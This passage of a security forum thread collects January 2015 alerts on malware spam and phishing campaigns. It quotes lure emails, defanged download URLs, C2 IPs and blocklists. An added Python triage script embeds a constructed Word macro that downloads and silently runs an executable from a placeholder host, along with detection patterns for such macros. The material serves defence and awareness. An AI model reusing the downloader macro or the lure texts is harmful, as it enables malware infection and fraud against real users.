- http://blog.dynamoo.com/2015/01/malware-spam-you-have-received-new.html
23 Jan 2015 - "... these RBS BankLine spam messages are a popular mechanism for the bad guys to spread malware.
From: Bankline [secure.message@ rbs .com .uk]
Date: 23 January 2015 at 12:43
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
<redacted>
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly...
The link in the email seems to be somewhat dynamic... The landing page looks like this:
> http://4.bp.blogspot.com/-LLqihSXhTvU/VMJVxFvr-PI/AAAAAAAAGKw/rEq-NZnPuJo/s1600/fake-rbs.jpg
The link on that landing page goes to http ://animation-1 .com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded. The ThreatExpert report shows that it attempts to communicate with the well-known-bad-IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan."
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
:fear: :mad:
AplusWebMaster
2015-01-26, 16:49
FYI...
Fake 'HP Scanned Image' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-hp-digital-device-scanned.html
26 Jan 2015 - "This spam comes with a malicious attachment:
From: HP Digital Device [HP_Printer@ victimdomain .com]
Date: 26 January 2015 at 13:04
Subject: Scanned Image
Please open the attached document.
This document was digitally sent to you using an HP Digital Sending device...
This email has been scanned for viruses and spam...
Attached is a file ScannedImage.zip which contains a malicious executable ScannedImage.scr which has a VirusTotal detection rate of 5/56*..."
* https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/
- http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/
26 Jan 2015
> https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/
___
Fake 'Berendsen Invoice' SPAM – doc malware
- http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
26 Jan 2015 - "'Berendsen UK Ltd Invoice 60020918 117' pretending to come from donotreply@berendsen.co.uk with -a malicious word doc attachment- is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Sir/Madam, Please find attached your invoice dated 1st January. All queries should be directed to your branch that provides the service. This detail can be found on your invoice. Thank you...
26 January 2015: IRN001526_60020918_I_01_01.DOC (39 kb)
Current Virus total detections: 0/55* | IRN001526_60020918_I_01_01.DOC (34kb) 0/56**
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/17b2a838cf97a51a957b4fdac872da5275099eafe51d9ef36e4ccd0807863cd6/analysis/1422258625/
** https://www.virustotal.com/en/file/0425efe9926a2224ab2116142b769e924252320194a347f52d0800c6005caeec/analysis/1422258320/
- http://blog.dynamoo.com/2015/01/malware-spam-berendsen-uk-ltd-invoice.html
26 Jan 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/
- http://blog.mxlab.eu/2015/01/26/email-berendsen-uk-ltd-invoice-60020918-117-contains-malicious-word-attachment/
Jan 26, 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/
___
Fake 'CardsOnLine natwesti' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-cardsonlinenatwesticom.html
26 Jan 2015 - "This -fake- NatWest email leads to malware:
From: CardsOnLine [CardsOnLine@ natwesti .com]
Date: 26 January 2015 at 13:06
Subject: Cards OnLine E-Statement E-Mail Notification
Body:
Dear Customer
Your July 30, 2014 E-Statement for account number xxxxxxxxxxxx6956 from Cards OnLine is now available.
For more information please check link: <redacted>
Thank you
Cards OnLine
... Users have recently been targeted through -bogus- E-Mails by fraudsters claiming to be from their bank. These E-Mails ask customers to provide their internet banking security details in order to reactivate their account or verify an E-Mail address. Please be on your guard against E-Mails that request any of your security details... Users who click-the-link see a download page similar to this:
> https://4.bp.blogspot.com/-a7BgUdoOpJM/VMZTVvYZRHI/AAAAAAAAGLE/f3cZqKKwrpA/s1600/natwest-download.png
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe. This binary has a VirusTotal detection rate of 1/56* and is identified by Norman AV as Upatre..."
* https://www.virustotal.com/en/file/87c96a40af60b3f4d99bf6c2c261a4cdcfce6c46b682c49acce4ca424190aa2c/analysis/1422281915/
___
Fake 'Sage Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-re-invoice-9836956-fake-pdf-malware/
26 Jan 2015 - "'RE: Invoice #9836956' pretending to come from Sage .co .uk <no-reply@ sage .co .uk>
[random invoice numbers] with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please remit BACs before 26/01/2015. The document attached.
The malware attached to this email is exactly the same as in today’s Scanned Image – fake PDF malware*.
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/
:fear: :mad:
AplusWebMaster
2015-01-27, 17:38
FYI...
Whatsapp leads to Fake Flash update – malware
- http://myonlinesecurity.co.uk/whatsapp-notification-leading-fake-flashplayer-update-malware/
27 Jan 2015 - "An email pretending to come from somebody you know that appears to be a Whatsapp notification is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update1-262x300.png
When you press the play button in the email, you get sent to a page looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update2-1024x739.png
... if you select the 'upgrade now' button you end up with a fake flash player update and a badly infected computer...
27 January 2015: adobe_flash_player_update.exe . Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/78ddffc79c02331fd229c563e0a442bb018716f6d86bbf96c41518daa64a2ac6/analysis/1422376705/
___
Fake 'invoice' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-eileen-meade-r-kern.html
27 Jan 2015 - "Kern Engineering & Mfg Corp. is a wholly legitimate firm, they are not sending out this spam nor have their systems been compromised in any way. Instead, this is a -forgery- which has a malicious Word document attached.
From: Eileen Meade [eileenmeade@ kerneng .com]
date: 27 January 2015 at 08:25
subject: inv.# 35261
Here is your invoice & Credit Card Receipt.
Eileen Meade
R. Kern Engineering & Mfg Corp.
Accounting
909) 664-2442
Fax 909) 664-2116
So far, I have seen two different versions of the Word document, both poorly detected [1] [2] and containing two different macros... These attempt to download a binary from one of the following locations:
http ://UKR-TECHTRAININGDOMAIN .COM/js/bin.exe
http ://schreinerei-ismer.homepage.t-online .de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57*..."
1] https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422351101/
2] https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422351116/
* https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/
- http://myonlinesecurity.co.uk/eileen-meade-kern-engineering-inv-87049-word-doc-malware/
27 Jan 2015
> https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422350612/
> https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422350713/
- http://blog.mxlab.eu/2015/01/27/fake-email-from-r-kern-engineering-inv-57949-contains-malicious-word-document/
Jan 27, 2015
> https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/
216.251.43.17: https://www.virustotal.com/en/ip-address/216.251.43.17/information/
80.150.6.138: https://www.virustotal.com/en/ip-address/80.150.6.138/information/
:fear: :mad:
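The macro documents in the post above and in the earlier "tax return" and "Berendsen" posts all follow the same pattern: an auto-run macro fetches an executable (bin.exe, mui.php) over HTTP, writes it under a random name in %TEMP%, and runs it. That pattern can be triaged statically from the macro source, without detonating the document. The script below is an added example, not code from the post or from the blogs it quotes. The VBA text is constructed to mimic the described behaviour, uses a non-routable placeholder hostname (example-invalid.test) rather than any of the real download sites, and reuses the drop name %TEMP%\sdfsdferfwe.exe from the post; the real macros are not reproduced. In practice the macro source would come from a tool such as olevba, which is assumed but not required here; the detection keyword lists are an assumption of the example.

```python
"""Static triage of a Word macro of the kind the write-ups describe.

Added example (not code from the post or the quoted blogs). The VBA text is
constructed to mimic the described behaviour: fetch bin.exe, write it to
%TEMP%, run it. It uses a non-routable placeholder host; the real macros
are not reproduced. Macro source would normally be extracted with a tool
such as olevba and fed to triage_vba().
"""
from __future__ import annotations

import re

# Constructed sample (hostname is a placeholder, not an indicator).
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim strURL As String
    strURL = "http://" & "example-invalid.test" & "/js/bin.exe"
    Dim strPath As String
    strPath = Environ("TEMP") & "\sdfsdferfwe.exe"
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    xHttp.Open "GET", strURL, False
    xHttp.Send
    With CreateObject("ADODB.Stream")
        .Open
        .Type = 1
        .Write xHttp.responseBody
        .SaveToFile strPath, 2
        .Close
    End With
    Shell strPath, vbHide
End Sub
'''

# Constructed benign macro used as a control.
BENIGN_VBA = '''
Sub FormatTable()
    Selection.Tables(1).Borders.Enable = True
End Sub
'''

# Heuristic patterns; the keyword lists are an assumption, not exhaustive.
AUTO_EXEC = re.compile(r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open|Auto_Open)\b", re.I)
DOWNLOAD = re.compile(r"\b(Microsoft\.XMLHTTP|MSXML2\.XMLHTTP|MSXML2\.ServerXMLHTTP|"
                      r"WinHttp\.WinHttpRequest|URLDownloadToFile|ADODB\.Stream)\b", re.I)
EXECUTE = re.compile(r"\b(Shell|WScript\.Shell|ShellExecute|CreateProcess|Exec)\b", re.I)
TEMP_DROP = re.compile(r'Environ\s*\(\s*"TEMP"\s*\)', re.I)
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
STR_CONCAT = re.compile(r'"\s*&\s*"')  # "http://" & "host": split-string IOC hiding


def join_string_concat(vba: str) -> str:
    """Collapse adjacent string literals joined with & so URLs read whole."""
    return STR_CONCAT.sub("", vba)


def triage_vba(vba: str) -> dict:
    """Score one macro: which stages are present, any URLs, and a verdict."""
    text = join_string_concat(vba)
    result = {
        "auto_exec": bool(AUTO_EXEC.search(text)),
        "download": bool(DOWNLOAD.search(text)),
        "execute": bool(EXECUTE.search(text)),
        "temp_drop": bool(TEMP_DROP.search(text)),
        "urls": sorted(set(URL_RE.findall(text))),
    }
    if result["download"] and result["execute"]:
        result["verdict"] = "downloader"
    elif result["download"] or result["execute"] or result["urls"]:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "clean"
    return result


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = triage_vba(src)
        print(f"{label}: {r['verdict']} urls={r['urls']}")
```

The string-concatenation step matters: the low VirusTotal detection rates quoted for these documents come partly from the download URL being split across several literals, so any keyword or URL match has to run on the joined text. The URLs the script recovers are exactly what the blogs publish as blocklist entries.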
AplusWebMaster
2015-01-28, 14:24
FYI...
Fake 'invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/windsor-flowers-invoice-1385-word-doc-malware/
28 Jan 2015 - "'Windsor Flowers Invoice 1385' pretending to come from Windsor Flowers Accounts <windsorflowersaccounts@ hotmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus... The email looks like:
Dear Accounts payable
Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.
If you have any queries, please do not hesitate to contact me.
Many thanks in advance
Connie
Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277...
28 January 2015: Windsor Flowers Invoice 1385 Sheet1.doc (2 different versions)
Current Virus total detections: (76kb) 3/57* | (84 kb) 3/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/29e3cf6745741414e3249c10a60f146a0f7dc8776b77fb1c18a8cd71233bdfcf/analysis/1422442083/
** https://www.virustotal.com/en/file/0dc4f465af070ed0e15c1ab5932956fa8542688bb4e0de37b6efdc32b63cf8b1/analysis/1422443094/
___
Fake 'RBS' SPAM - pdf-malware
- http://myonlinesecurity.co.uk/rbs-morning-commentary-fake-pdf-malware-2/
28 Jan 2015 - "'RBS Morning commentary' pretending to come from RBS .COM <no-replay@ rbs .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please refer to the details below if you are having problems reading the attached file.
Please do not contact your Treasury Centre for technical issues – these should be routed to RBS FM support.The attached file is in zip format; first you have to unzip it (self-extracting archive, Adobe PDF) and then it can be viewed in Adobe Acrobat Reader 3.0 or above. If you do not have a copy of the software please contact your technical support department...
All the attachment numbers are random but all extract to same -malware- payload.
28 January 2015: attachment3532715.zip: Extracts to: attachment.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fdb5ee90aacbac3fcde716adfc837f96d0f12f85d9a5ffd9f60eea6f66376b00/analysis/1422448752/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
xHamster involved in large Malvertising campaign ...
- https://blog.malwarebytes.org/exploits-2/2015/01/top-adult-site-xhamster-involved-in-large-malvertising-campaign/
Jan 27, 2015 - "... a particular large malvertising campaign in progress from popular adult site xhamster[.]com, a site that boasts half a billion visits a month. In the past two days we have noted a 1500% increase in infections starting from xHamster. Contrary to the majority of drive-by download attacks which use an exploit kit, this one is very simple and yet effective by embedding landing page and exploit within a rogue ad network... The URL linked to is a simplified landing page hosted by what looks like a rogue ad network. The landing simply consists of preparing for a Flash Player exploit... the Flash exploit itself (0 detection on VT*), again hosted on the same ad network. Depending on your version of Flash you may get the recent 0-day:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/flash-300x262.png
Upon successful exploitation, a malicious payload (Bedep) VT 2/57**, is downloaded from:
hxxp ://nertafopadertam .com/2/showthread.php
What we see post exploitation is ad fraud as described here***... While malvertising on xHamster is nothing new, this particular campaign is extremely active. Given that this adult site generates a lot of traffic, the number of infections is going to be huge."
* https://www.virustotal.com/en/file/b0cb277928be3a1072d6c05c7ab6386f2e0c836d51f71cfefeae8f061bdf1ee8/analysis/1422391909/
** https://www.virustotal.com/en/file/00ce05a515ac0c081636712979b6c04b02b3089cc3e3a2af2554a6ff62330f85/analysis/1422393597/
*** https://blog.malwarebytes.org/exploits-2/2015/01/new-adobe-flash-zero-day-found-in-the-wild/
:fear: :mad:
AplusWebMaster
2015-01-29, 15:56
FYI...
Fake 'Invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
29 Jan 2015 - "'Invoice #10413 from SPOTLESS CLEANING' pretending to come from paulamatos@ btinternet .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This message contains Invoice #10413 from SPOTLESS CLEANING. If you have questions about the contents of this message or Invoice, please contact SPOTLESS CLEANING.
SPOTLESS CLEANING
GLYNDEL HOUSE
BOWER LANE
DA4 0AJ
07956 379907
29 January 2015 : SPOTLESS CLEANING-Invoice-10413.doc - Current Virus total detections: 0/57*
... this malicious word doc with macros downloads from www .otmoorelectrical .co.uk/js/bin.exe which is saved as %temp%\hDnyDA.exe (dridex banking Trojan) which has a current detection rate of 2/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422523082/
** https://www.virustotal.com/en/file/6f738e8f6cd3a6abba6168a0046288690f4ee6aa778fbe202a3eac458168ceea/analysis/1422531540/
___
Fake 'BACS Transfer' SPAM - doc malware
- http://myonlinesecurity.co.uk/garth-hutchison-bacs-transfer-remittance-jsag400gbp-word-doc-malware/
29 Jan 2015 - "'Garth Hutchison BACS Transfer : Remittance for JSAG400GBP' pretending to come from Garth Hutchison <accmng2556@ blumenthal .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
29 January 2015 : BACS_transfer_JS87123781237.doc - Current Virus total detections: 0/57*
... same malware payload as today’s Invoice #10413 from SPOTLESS CLEANING – Word doc malware** ..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422524523/
** http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
___
Swiss users inundated with malware-laden SPAM
- http://net-security.org/malware_news.php?id=2950
29.01.2015 - "Swiss users are being heavily targeted by a number of spam campaigns delivering the Tiny Banker (TinBa or Busy) e-banking Trojan. Starting with Tuesday, the spammy emails seem to come from email addresses opened with big Swiss free email service providers (bluewin .ch, gmx .ch) and Swiss telecom provider Orange (orange .ch), but actually originate from broadband lines located all over the world. They masquerade as emails containing images sent from iPhones, an MMS sent to the user by Orange, and an application for a job position:
> http://www.net-security.org/images/articles/swiss-spam-29012015.jpg
Unfortunately for those who fall for these tricks, the attached ZIP files contain only malware. "While most of the Tinba versions I usually come across are utilising a Domain Generation Algorithm (DGA) to calculate the current botnet C&C domain, the version of Tinba that has been spread in Switzerland since yesterday is using hard-coded botnet C&C domains," noted Swiss security activist Raymond Hussy*. Further investigation revealed that all the sending IP addresses are Cutwail infected IPs, and the malware tries to contact four distinct C&C servers, two of which have already been sinkholed. Hussy recommends that network administrators block traffic to and from the remaining two active domains (serfanteg .ru, midnightadvantage .ru) and the following IPs: 91.220.131.216 and 91.220.131.61. "In general, 91.220.131.0/24 looks quite suspect. So you may want to block the whole netblock," he pointed out, adding that it would also be a good idea to block filenames with multiple file extensions on their email gateway."
* https://www.abuse.ch/?p=9095
91.220.131.61: https://www.virustotal.com/en/ip-address/91.220.131.61/information/
91.220.131.216: https://www.virustotal.com/en/ip-address/91.220.131.216/information/
:fear: :mad:
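The Tinba write-up above and the earlier "IRS Fiscal Activity" post both end in a recommended blocklist, mixing single IPs, a whole /24 netblock and bare domains (written "garbux .com" style to defang them). Turning such a list into something that can be checked against proxy or firewall logs is routine, but the two things people get wrong are subdomain matching and netblock containment. The script below is an added example, not code from either post or the blogs they quote: it parses the indicators exactly as they appear in the posts (comment lines and the "name .tld" defanging included), then runs them over a few constructed log lines whose destinations are drawn from the posts' blocklists plus a benign control address in the 198.51.100.0/24 documentation range. The log format is an assumption of the example.

```python
"""Apply the blocklists published in the write-ups to connection logs.

Added example (not code from the posts or the quoted blogs). Indicators are
taken verbatim from the posts' blocklists; the log lines and their
key=value format are constructed for the demo.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass, field

# Copied from the two posts' recommended blocklists, defanged as they appear.
INDICATORS = [
    "# from the IRS Fiscal Activity write-up",
    "89.108.88.9", "78.24.219.6", "109.105.193.99",
    "irsuk .co", "garbux .com", "ukirsgov .com",
    "# from the Tinba write-up (whole netblock, as recommended)",
    "91.220.131.0/24", "serfanteg .ru", "midnightadvantage .ru",
]

# Constructed log lines; destinations are from the blocklists above except
# the 198.51.100.x control addresses (documentation range, never routed).
SAMPLE_LOG = [
    "2015-01-29T10:12:03Z src=10.0.0.15 dst=91.220.131.61 dport=80 host=serfanteg.ru",
    "2015-01-29T10:12:09Z src=10.0.0.15 dst=91.220.131.200 dport=443",
    "2015-01-29T10:13:00Z src=10.0.0.22 dst=198.51.100.7 dport=80 host=cdn.garbux.com",
    "2015-01-29T10:14:30Z src=10.0.0.22 dst=198.51.100.9 dport=443 host=example.com",
]

LOG_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Blocklist:
    networks: list = field(default_factory=list)   # ipaddress networks (/32 for single IPs)
    domains: set = field(default_factory=set)      # lowercase, no trailing dot

    @classmethod
    def parse(cls, lines: list[str]) -> "Blocklist":
        """Accept IPs, CIDRs and domains; undo the 'foo .com' / 'foo[.]com' defanging."""
        bl = cls()
        for raw in lines:
            item = raw.strip().replace(" .", ".").replace("[.]", ".").lower()
            if not item or item.startswith("#"):
                continue
            try:
                bl.networks.append(ipaddress.ip_network(item, strict=False))
            except ValueError:          # not an address or CIDR, so treat as a domain
                bl.domains.add(item.rstrip("."))
        return bl

    def matches_ip(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.networks)

    def matches_domain(self, host: str) -> bool:
        """True for the domain itself or any subdomain of a listed domain."""
        labels = host.lower().rstrip(".").split(".")
        return any(".".join(labels[i:]) in self.domains for i in range(len(labels)))


def check_log(bl: Blocklist, lines: list[str]) -> list[tuple[str, str]]:
    """Return (line, reason) for each log line that touches a blocked indicator."""
    hits = []
    for line in lines:
        kv = dict(LOG_RE.findall(line))
        if "dst" in kv and bl.matches_ip(kv["dst"]):
            hits.append((line, f"ip {kv['dst']}"))
        elif "host" in kv and bl.matches_domain(kv["host"]):
            hits.append((line, f"domain {kv['host']}"))
    return hits


if __name__ == "__main__":
    blocklist = Blocklist.parse(INDICATORS)
    for line, reason in check_log(blocklist, SAMPLE_LOG):
        print(f"BLOCKED ({reason}): {line}")
```

Note that the second log line hits only because the whole 91.220.131.0/24 was listed, as Hussy suggested; with just the two published addresses it would pass, and the third line is caught by the Host header even though its IP is clean, which is why both dimensions need checking.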
AplusWebMaster
2015-01-30, 14:59
FYI...
Fake 'BACS Transfer' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-bacs-transfer-remittance.html
30 Jan 2015 - "So far I have only seen one sample of this..
From "Garth Hutchison"
Date 21/01/2015 11:50
Subject BACS Transfer : Remittance for JSAG400GBP
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57*] which contains a macro... which downloads a file from:
http ://stylishseychelles .com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57** identifying it as a Dridex download... Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218 "
* https://www.virustotal.com/en/file/901652283bd26716f3d5d2d6f4d032e0d942302877c51529e101a5a53c631de7/analysis/1422618493/
** https://www.virustotal.com/en/file/32b8d7069dae180e0f2666301384411243256d9abc681f897eb67bf0fd6e6406/analysis/1422618468/
___
Fake BBB SPAM - PDF malware
- http://myonlinesecurity.co.uk/bbb-sbq-form-2508ref61-959-0-4-fake-pdf-malware/
30 Jan 2015 - "'BBB SBQ Form #2508(Ref#61-959-0-4)' pretending to come from Admin <no-replay@ bbbl .org> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/BBB.png
30 January 2015: SBQForm-57675.zip ( 13kb) : Extracts to: doc-PDF.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/027d6621ed2c127a311006f17edeacabaf6dd2abefa3d1078e6e140403192a1f/analysis/1422628270/
... Behavioural information
TCP connections
46.165.223.77: https://www.virustotal.com/en/ip-address/46.165.223.77/information/
31.170.162.203: https://www.virustotal.com/en/ip-address/31.170.162.203/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
208.91.197.54: https://www.virustotal.com/en/ip-address/208.91.197.54/information/
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
___
Fake 'RE-CONFIRM' SPAM - malware
- http://myonlinesecurity.co.uk/re-confirm-p-oxx1ll112-malware/
30 Jan 2015 - "'RE-CONFIRM P.O©{XX1ll112}' pretending to come from sensaire@ emirates .net .ae with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/RE-CONFIRM-P.O%C2%A9XX1ll112.png
30 January 2015: Purchase order(1).zip: Extracts to: Purchase order.exe
Current Virus total detections: 12/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper file with an icon saying A instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8e60c22f0f013b03db8f65d29b2321f74bdf9300fbadcbf3f730556ad95c6255/analysis/1422633004/
___
Fake 'Apple Termination' – Phish ...
- http://myonlinesecurity.co.uk/apple-termination-phishing/
30 Jan 2015 - "'Apple Termination' pretending to come from Apple Account <support@ apple-messages .com> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Termination.png
If you follow the link you see a webpage looking like this, with a pre-filled box containing your email address:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID.png
When you fill in your user name and password you get a page looking like this (split into sections), where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_3.png
... these emails use social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___
Fake 'Tesco Bank' – Phish ...
- http://myonlinesecurity.co.uk/latest-estatement-ready-tesco-bank-phishing/
30 Jan 2015 - "'Latest estatement is ready – Tesco Bank' pretending to come from savings@ tescobank .com <pol@ tesco .com> is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one only wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email.
Certain restriction has been placed on your tesco bank online services
View your eDocument attached to proceed
Tesco Bank is a retail bank in the United Kingdom which was formed in 1997,
and which has been wholly owned by Tesco PLC since 2008
©Tesco Personal Finance plc 2014 / ©Tesco Personal Finance Compare Limited 2014.
If you open the attached html form you see this message:
Your Latest Tesco Bank Saving Account Statement is ready.
Certain restriction has been placed on your tesco bank online service
You would be required to re – activate your online banking access to proceed
Activate Your Online Access
If you follow that link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
:fear::fear: :mad:
AplusWebMaster
2015-01-31, 19:51
FYI...
Super Bowl Phishing -and- SPAM ...
